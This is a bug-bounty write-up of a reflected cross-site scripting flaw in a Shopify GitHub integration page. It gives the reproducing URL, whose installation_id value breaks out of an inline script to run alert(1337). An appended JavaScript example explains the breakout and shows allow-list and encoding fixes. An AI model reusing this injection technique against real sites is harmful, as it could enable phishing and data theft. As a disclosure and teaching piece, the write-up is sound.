Reflected Cross-Site Scripting (Awarded a $3500 Bounty)
Hello, Hunters. You are here because you are struggling or want to advance in your career. Believe me, things take time. Be consistent, continue to learn, and never deceive yourself. If you follow these three mantras, you will undoubtedly achieve success.
Without wasting time, let's start:
The "Shopify GitHub Integration" tool makes it easier to link a GitHub account to a Shopify store. A vulnerable URL, https://online-store-git.shopifycloud.com, is used during the GitHub connection process.
Shop used to test: devpresent.myshopify.com
Relevant Request IDs: x-request-id: 1cdb077b2d319acccd1237c1142cf89b
Steps To Reproduce:
1. Visit the following URL:
https://online-store-git.shopifycloud.com/github/setup?installation_id=20913869%7d%7d%7d%29%3b%7d%3balert%281337%29%3bif%281==2%29%7bk=new%20Promise%28function%28%29%7bif%281==2%29%7bv=%7be:%201&setup_action=install
2. After decoding, the above URL reads: "https://online-store-git.shopifycloud.com/github/setup?installation_id=20913869}}});};alert(1337);if(1==2){k=new Promise(function(){if(1==2){v={e: 1&setup_action=install"
Payload used: alert(1337)
3. Enter owner or staff credentials.
4. The XSS will fire.
Impact
There are several impacts.
- The attacker could use JavaScript to carry out phishing attacks.
- Steal data.
- Reflected JS
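Why the decoded installation_id from step 2 runs as script, and two server-side fixes, shown as an added example that is not from the original report or from Shopify's code. The inline-script template (PREFIX/SUFFIX) is a hypothetical stand-in because the write-up does not show the page source, and every function name is an assumption.

```javascript
// Added example. PREFIX/SUFFIX model a hypothetical inline <script> body;
// the write-up does not show the real page source.
const PREFIX = 'function init(){ setup({ github: { install: { id: ';
const SUFFIX = ' } } }); }';

// URL from step 1 of the write-up, copied as published.
const REPORT_URL = 'https://online-store-git.shopifycloud.com/github/setup' +
  '?installation_id=20913869%7d%7d%7d%29%3b%7d%3balert%281337%29%3bif%281==2%29' +
  '%7bk=new%20Promise%28function%28%29%7bif%281==2%29%7bv=%7be:%201' +
  '&setup_action=install';

function installationIdFrom(url) {
  return new URL(url).searchParams.get('installation_id');
}

// Vulnerable pattern: the raw parameter is concatenated into JavaScript
// source, so its leading "}}});}" closes the template's own braces and the
// rest of the value is parsed as statements.
function renderVulnerable(rawId) {
  return PREFIX + rawId + SUFFIX;
}

// Fix 1: allow-list validation. The ID on the page is a plain integer, so
// anything that is not 1 to 19 decimal digits is rejected outright.
function parseInstallationId(rawId) {
  return typeof rawId === 'string' && /^[1-9][0-9]{0,18}$/.test(rawId) ? rawId : null;
}

// Fix 2: context-aware encoding. Emit the value as a JS string literal and
// escape characters that could end the <script> element or the line.
function jsLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(rawId) {
  const id = parseInstallationId(rawId);
  if (id === null) return null; // caller should respond 400 Bad Request
  return PREFIX + jsLiteral(id) + SUFFIX;
}

const reflected = installationIdFrom(REPORT_URL);
console.log('vulnerable:', renderVulnerable(reflected));
console.log('hardened  :', renderHardened(reflected), renderHardened('20913869'));
```

Validation alone already blocks this request; the encoder is the second layer for parameters that cannot be restricted to digits.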
Thank you for reading! I hope you get to learn some tricks.